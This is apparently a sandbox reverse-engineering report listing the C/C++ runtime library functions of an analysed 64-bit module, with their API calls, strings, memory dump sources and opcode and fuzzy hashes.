Opcode ID: 7bd4bc7abcc8a4836d39e7da98d53ee03728a912233b5579514d35805e087cf1
Instruction ID: 5f1ab1a375a8ed2581114272e7d7b0886a6f8d1ffbea24d1cc876fb1800b83ce
Opcode Fuzzy Hash: 7bd4bc7abcc8a4836d39e7da98d53ee03728a912233b5579514d35805e087cf1
Instruction Fuzzy Hash: 81E1C073600B888AE7A2DF24D4813ED7BA0F748798F158115FE9947796DF34C689C700

Function 000000018001E8A0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000000018001E8AF
FlsSetValue.KERNEL32(?,?,?,000000018001939D,?,?,?,?,00000001800257B6,?,?,00000000,0000000180019413,?,?,?), ref: 000000018001E8E5
FlsSetValue.KERNEL32(?,?,?,000000018001939D,?,?,?,?,00000001800257B6,?,?,00000000,0000000180019413,?,?,?), ref: 000000018001E912
FlsSetValue.KERNEL32(?,?,?,000000018001939D,?,?,?,?,00000001800257B6,?,?,00000000,0000000180019413,?,?,?), ref: 000000018001E923
FlsSetValue.KERNEL32(?,?,?,000000018001939D,?,?,?,?,00000001800257B6,?,?,00000000,0000000180019413,?,?,?), ref: 000000018001E934
SetLastError.KERNEL32 ref: 000000018001E94F

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: df7c9950fb5633351461af4a6d4e2ef1a857583ee845652aa489ec2b42b2e859
Instruction ID: ec2c4ed793237eacadfbf0f45515e6967a71af1e8c29bf5330405200443a1ebd
Opcode Fuzzy Hash: df7c9950fb5633351461af4a6d4e2ef1a857583ee845652aa489ec2b42b2e859
Instruction Fuzzy Hash: D1116A30204B8C86FADBA37295453EE62926B4D7F4F14C726B976076D7DF28C60A8340

Function 000000018000593C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 162COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 0000000180005B0F
std::ios_base::failure::failure.LIBCPMT ref: 0000000180005B63

Strings

ios_base::badbit set, xrefs: 0000000180005AD7, 0000000180005B2B
ios_base::eofbit set, xrefs: 0000000180005AEA, 0000000180005B3E
ios_base::failbit set, xrefs: 0000000180005AE3, 0000000180005B37

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: 63c37f64b4238da11ea6515a961e33667d0c08f10c0bd9c84869a98c7ff7845f
Instruction ID: ebc79c75a70d9494811fa8443994b3e223948e18f9dddef28d0b14d8c553250c
Opcode Fuzzy Hash: 63c37f64b4238da11ea6515a961e33667d0c08f10c0bd9c84869a98c7ff7845f
Instruction Fuzzy Hash: 8661A032300A4885EBA6DB15D4913EE7760FB89FD6F59C116EA8E477A5DF38C60AC301

Function 00000001800123A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000001800123CB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000000180012460
RtlUnwindEx.KERNEL32 ref: 00000001800124AF

Strings

f, xrefs: 00000001800123DE
csm, xrefs: 0000000180012446

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: e3b96603f9174a24cab67cfdb4e29505e30f04677641fe99e9d57ef17ddcbf36
Instruction ID: 46a54e1a8b2e558e3fad4e0f76577156aba5a5d116c785071923e6366e9a12d5
Opcode Fuzzy Hash: e3b96603f9174a24cab67cfdb4e29505e30f04677641fe99e9d57ef17ddcbf36
Instruction Fuzzy Hash: 1D51AD32611E088BEB9ACF15E494B9937A6F348BD8F91C124FE5647788EF34DA59C700

Function 0000000180018B30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000000180018B55
GetProcAddress.KERNEL32 ref: 0000000180018B6B
FreeLibrary.KERNEL32 ref: 0000000180018B92

Strings

mscoree.dll, xrefs: 0000000180018B4C
CorExitProcess, xrefs: 0000000180018B64

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 61b98247a4544f8c35314c5e8c142d002c8699fc759c736d92b86ff94ff0a1e6
Instruction ID: 984c09bea15bf6d719f9798ed51626e49399f0ab656169e1035e446950acf3dd
Opcode Fuzzy Hash: 61b98247a4544f8c35314c5e8c142d002c8699fc759c736d92b86ff94ff0a1e6
Instruction Fuzzy Hash: 1BF062B1214B0885EB968B24E4843DA6360EB4D7E6F599615E66A465F4CF3CC74DC300

Function 00000001800129F8 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 0000000180012B1B
__AdjustPointer.LIBCMT ref: 0000000180012B66

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: fe9b2715a09737585fcd9e95c05290807fc2ec4ea6aad6357f3721b8d7d77ab0
Instruction ID: 5e17619b0902fc68a659db9c7b41421f55c903e9d12112478928451b0cdb246f
Opcode Fuzzy Hash: fe9b2715a09737585fcd9e95c05290807fc2ec4ea6aad6357f3721b8d7d77ab0
Instruction Fuzzy Hash: C8B19F3220AE4C85EBE7DF15D4807E96791EB5CBC4F19C425BE4907785EF38C6AA8341

Function 0000000180002A74 Relevance: 7.6, APIs: 5, Instructions: 138COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000180002A89
std::_Lockit::_Lockit.LIBCPMT ref: 0000000180002AAE
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180002AD8
std::_Facet_Register.LIBCPMT ref: 0000000180002B4F
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180002B69

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 1ee6f129745dfb786a4c9b0b704dca0696572e15b5b9e97bd81fbeced7c897fc
Instruction ID: 75936afc8fba2e9bb15ceab2f3ce6a501666a2e79e755e86060e8152fa3a9903
Opcode Fuzzy Hash: 1ee6f129745dfb786a4c9b0b704dca0696572e15b5b9e97bd81fbeced7c897fc
Instruction Fuzzy Hash: 79517B32201B8885EB96DF1AE5843D9B760F759BE4F58C122EB5C477A5DF38C66AC300

Function 0000000180002964 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000180002979
std::_Lockit::_Lockit.LIBCPMT ref: 000000018000299E
std::_Lockit::~_Lockit.LIBCPMT ref: 00000001800029C8
std::_Facet_Register.LIBCPMT ref: 0000000180002A3F
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180002A59

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: e59c49af1818900ca9bbe76b9138d16f8de1cee7b5e55582864f6c46de69244f
Instruction ID: e3b6d505b7a68b4f57d45df470cd1953456489c84ff84efb060058f2a88fae9f
Opcode Fuzzy Hash: e59c49af1818900ca9bbe76b9138d16f8de1cee7b5e55582864f6c46de69244f
Instruction Fuzzy Hash: 33316132201A8881FAD7EF15E4487D97361F79DBE4F489622EE59476D9DF38C64A8300

Function 000000018002D7F0 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000000018002D818
_set_statfp.LIBCMT ref: 000000018002D833
_set_statfp.LIBCMT ref: 000000018002D84F
_set_statfp.LIBCMT ref: 000000018002D88B

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 129b0f4056eb2f3b8801baa1b67ea7ab7c9715ca6d7d5caaa11af7222d674743
Instruction ID: 1b539b2404dac1850cc307d629a99d7ab22d003b4fb24a627d46a698b8498cb1
Opcode Fuzzy Hash: 129b0f4056eb2f3b8801baa1b67ea7ab7c9715ca6d7d5caaa11af7222d674743
Instruction Fuzzy Hash: 4A11E976E10A0D01FAD72164E4563F513406B5C3F2F14C636BAB64A3E6DF948E8C4301

Function 000000018001E968 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,0000000180015E93,?,?,00000000,000000018001612E,?,?,?,?,?,00000001800160BA), ref: 000000018001E987
FlsSetValue.KERNEL32(?,?,?,0000000180015E93,?,?,00000000,000000018001612E,?,?,?,?,?,00000001800160BA), ref: 000000018001E9A6
FlsSetValue.KERNEL32(?,?,?,0000000180015E93,?,?,00000000,000000018001612E,?,?,?,?,?,00000001800160BA), ref: 000000018001E9CE
FlsSetValue.KERNEL32(?,?,?,0000000180015E93,?,?,00000000,000000018001612E,?,?,?,?,?,00000001800160BA), ref: 000000018001E9DF
FlsSetValue.KERNEL32(?,?,?,0000000180015E93,?,?,00000000,000000018001612E,?,?,?,?,?,00000001800160BA), ref: 000000018001E9F0

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: fab53df8a5ac89ff1a2b6a894063615218add15f02f9124c5e864f8d02772eff
Instruction ID: 00edae41e183fbd2e8606093cc37647827c6555097a09aed734637088f63a391
Opcode Fuzzy Hash: fab53df8a5ac89ff1a2b6a894063615218add15f02f9124c5e864f8d02772eff
Instruction Fuzzy Hash: 0E117C30604B8842FADBA76259513EE62416F4D3F0F24D326B879176D7DF28D6098301

Function 000000018001E7FC Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 000000018001E80D
FlsSetValue.KERNEL32 ref: 000000018001E82C
FlsSetValue.KERNEL32 ref: 000000018001E854
FlsSetValue.KERNEL32 ref: 000000018001E865
FlsSetValue.KERNEL32 ref: 000000018001E876

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: c63e81d2d01c90007976c0f5bc21046995a65ac1080587bdd1ddac7e77524400
Instruction ID: f4aba1b18a3e83186cccd927c59e601c147614a46c3b98da4e0a66e3739e800c
Opcode Fuzzy Hash: c63e81d2d01c90007976c0f5bc21046995a65ac1080587bdd1ddac7e77524400
Instruction Fuzzy Hash: 57113C30601B4D46FADFA37148553EE53819B4E3F4F28DB25793A1A2C3DF2897498341

Function 0000000180024B24 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180024E03

Part of subcall function 000000018002C720: _invalid_parameter_noinfo.LIBCMT ref: 000000018002C73D

Strings

ccs, xrefs: 0000000180024D3E
UTF-8, xrefs: 0000000180024D82
UTF-16LEUNICODE, xrefs: 0000000180024DA1

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 8bfc84b77e7558d68c5bb05920fb3a05a169634cc9774f19c0a581655e93d9a9
Instruction ID: 73528e983954968b617acd12009597acd9308e6cade8632c7583188e8deff3ed
Opcode Fuzzy Hash: 8bfc84b77e7558d68c5bb05920fb3a05a169634cc9774f19c0a581655e93d9a9
Instruction Fuzzy Hash: 46818A7760664885FBF78F2D81503E93BA1A719BC8F66C005FA025F695CF29CB0E9702

Function 0000000180024860 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180024B09

Part of subcall function 000000018002C904: _invalid_parameter_noinfo.LIBCMT ref: 000000018002C921

Strings

UTF-16LEUNICODE, xrefs: 0000000180024AAD
UTF-8, xrefs: 0000000180024A8C
ccs, xrefs: 0000000180024A55

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: b739ebd1dbea8a727751e982e1da672fd6c2c611dd31e54917325a34b04a2351
Instruction ID: 80a84d4d098a3c4f464374f21da0e3f071d9a556a617ffa4cdd0dc69658f86ce
Opcode Fuzzy Hash: b739ebd1dbea8a727751e982e1da672fd6c2c611dd31e54917325a34b04a2351
Instruction Fuzzy Hash: 5E81BE3368428C89FBF78E2882543FD6B90931E7C8F56E005FA069F6D5CE658B4D9706

Function 0000000180013D18 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000000180013D88
_CallSETranslator.LIBVCRUNTIME ref: 0000000180013DD3

Strings

MOC, xrefs: 0000000180013D9C
RCC, xrefs: 0000000180013DA4

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: a8877bf5d0e4bad6069ff70bf3287a204e51d1862cde21206b67471e813b6863
Instruction ID: c736c1bb93584ae073ba0961740df383fd4714e77903ce01b1a31605c7818c5f
Opcode Fuzzy Hash: a8877bf5d0e4bad6069ff70bf3287a204e51d1862cde21206b67471e813b6863
Instruction Fuzzy Hash: 2D915E73604B888AE792DB65E8813DD7BA0F7487C8F14811AFE495BB55DF38C299CB00

Function 0000000180001B58 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 178COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 0000000180001D9B

Strings

ios_base::badbit set, xrefs: 0000000180001D63
ios_base::eofbit set, xrefs: 0000000180001D76
ios_base::failbit set, xrefs: 0000000180001D6F

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: 16fe52f850bef8ed5e270e105fc610cef2d86c08c7f2c8be2c354118dca55619
Instruction ID: cd4883203d863c7c39e0db5225e3405b71a82b96ecb42569ab3962bb0b4856f9
Opcode Fuzzy Hash: 16fe52f850bef8ed5e270e105fc610cef2d86c08c7f2c8be2c354118dca55619
Instruction Fuzzy Hash: D4714C36604A48CAEBA2CB1AD0807E97761F788FD5F65C112EA5E477A4DF35CA4AC340

Function 000000018000901C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 168COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 0000000180009180

Strings

ios_base::badbit set, xrefs: 0000000180009147
ios_base::eofbit set, xrefs: 000000018000915B
ios_base::failbit set, xrefs: 0000000180009154

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: c6547c8cdb1939d3abec11c3b1841ed6733368eb2cef6ba46369ab6d2ade60fa
Instruction ID: f61552f5f331e396c0a83c9d1f5da47e63b06c29bd1c22d11c3c676521ce6c5e
Opcode Fuzzy Hash: c6547c8cdb1939d3abec11c3b1841ed6733368eb2cef6ba46369ab6d2ade60fa
Instruction Fuzzy Hash: 33717D32305A4886EBA6CF5AE4807D97760F788BD8F54C121EE5D47BA5DF39CA5AC300

Function 00000001800026E4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

ios_base::badbit set, xrefs: 00000001800028D7
ios_base::eofbit set, xrefs: 00000001800028EA
ios_base::failbit set, xrefs: 00000001800028E3

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID:
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 0-1866435925
Opcode ID: 187ecb3307b12a226db852eb9bffcc717b4bdc804262b8103927e5e34e8f6f4a
Instruction ID: 1528800ef260a51011fd75e31ca791da1bf86d8b63dc6a0af4851d87e0969327
Opcode Fuzzy Hash: 187ecb3307b12a226db852eb9bffcc717b4bdc804262b8103927e5e34e8f6f4a
Instruction Fuzzy Hash: 31618E36205A48C5EB96CB1AD1843AD77A1F788FD4F55C522EE5E477A1CF39CA4AC300

Function 0000000180013AFC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000000180013B48
_CallSETranslator.LIBVCRUNTIME ref: 0000000180013B97

Strings

MOC, xrefs: 0000000180013B5C
RCC, xrefs: 0000000180013B65

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 949eba60bfe1436def720ae9711f071dd7e126e8c028dd62d0ee54368417e9b9
Instruction ID: cc9ecc919c42db2e711bf199962303ced5b3878db019e83ba680d25fed8e0fb8
Opcode Fuzzy Hash: 949eba60bfe1436def720ae9711f071dd7e126e8c028dd62d0ee54368417e9b9
Instruction Fuzzy Hash: 24613632604B888AEB66CF65E4813DD7BA1F358BC8F148215EF4917B99DF38D299C740

Function 000000018001428C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000001800142B4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000000018001439C

Strings

csm, xrefs: 00000001800142D6
csm, xrefs: 00000001800143EE

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 24feafe34b7f4e4734d2cd1cdbc3c66b64a734135fe9cbc0eddb2a793dff242d
Instruction ID: 8def62964d0d07112c857a768adc3775481fba9ae0061bb8a7421994ddd90e1f
Opcode Fuzzy Hash: 24feafe34b7f4e4734d2cd1cdbc3c66b64a734135fe9cbc0eddb2a793dff242d
Instruction Fuzzy Hash: 0F517D73100A88CBEBB68B21D44439977A0F399BD8F14C116FA994BBE5CF38D659CB01

Function 0000000180002C6C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 0000000180002DF5

Strings

ios_base::badbit set, xrefs: 0000000180002DBD
ios_base::eofbit set, xrefs: 0000000180002DD0
ios_base::failbit set, xrefs: 0000000180002DC9

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: 6052f277294c7325cdd6c39261fcd92b8aece3d07cacde5bff69007a24180924
Instruction ID: ffa874df69a8d59811b18f2cb072da1b932660b01cb399449c92e6180a12e4b1
Opcode Fuzzy Hash: 6052f277294c7325cdd6c39261fcd92b8aece3d07cacde5bff69007a24180924
Instruction Fuzzy Hash: DA41BE32211B8889EB82CF09E5857D973A5F788BC9F5AC132EA5D47361DF39C64AC340

Function 00000001800082AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 80COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00000001800083D0

Strings

ios_base::badbit set, xrefs: 0000000180008398
ios_base::eofbit set, xrefs: 00000001800083AB
ios_base::failbit set, xrefs: 00000001800083A4

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: 1483f0d0e5597ee3d3bc5e42a03c8c570f37f667cbdbbaab889e759735f770c6
Instruction ID: 553f9d1b79fdb5cbf0ff6a4ea715b73a3b72cf907ec530c739d1fdb140e01e09
Opcode Fuzzy Hash: 1483f0d0e5597ee3d3bc5e42a03c8c570f37f667cbdbbaab889e759735f770c6
Instruction Fuzzy Hash: A631A172214A4885EBA2CB15D4917ED73A1FB88FC9F98C111EA8D47A65DF39CB49C700

Function 0000000180028B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0000000180028B39
FreeEnvironmentStringsW.KERNEL32 ref: 0000000180028BAB

Part of subcall function 000000018002556C: HeapAlloc.KERNEL32 ref: 00000001800255AA

FreeEnvironmentStringsW.KERNEL32 ref: 0000000180028C0A

Part of subcall function 0000000180020390: HeapFree.KERNEL32 ref: 00000001800203A6
Part of subcall function 0000000180020390: GetLastError.KERNEL32 ref: 00000001800203B0

Strings

COMSPEC, xrefs: 0000000180028B33

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
String ID: COMSPEC
API String ID: 3331406755-1631433037
Opcode ID: dd5757db43c420fd11c96a8b61c1df2c204f1df254f1a492a9bedeb1b5799a46
Instruction ID: 8d6182c0384a00fecd6fa28c1d844ba01a0e5b54fd335280352febb954ad993f
Opcode Fuzzy Hash: dd5757db43c420fd11c96a8b61c1df2c204f1df254f1a492a9bedeb1b5799a46
Instruction Fuzzy Hash: 3C31C53120575885EBA79F2668413DEB7A4FB8CBD4F48C129FA9A43BC5DF38C6458300

Function 00000001800088B4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 0000000180008957

Strings

ios_base::badbit set, xrefs: 0000000180008920
ios_base::eofbit set, xrefs: 0000000180008932
ios_base::failbit set, xrefs: 000000018000892B

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: 2a1609f4c14b0c136541bea646c8ed68dded474e54e32797f09511123f259526
Instruction ID: 861d3b77da0b2b32dc126a77598123f5272a54c856d743d1733f0fd017d39a8a
Opcode Fuzzy Hash: 2a1609f4c14b0c136541bea646c8ed68dded474e54e32797f09511123f259526
Instruction Fuzzy Hash: 3A11933221064D96FB96EB11E5413DA73A0FB587C8F888015F78947A95DF38D2A9C701

Function 0000000180005CAC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 0000000180005D36

Strings

ios_base::badbit set, xrefs: 0000000180005CFF
ios_base::eofbit set, xrefs: 0000000180005D11
ios_base::failbit set, xrefs: 0000000180005D0A

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
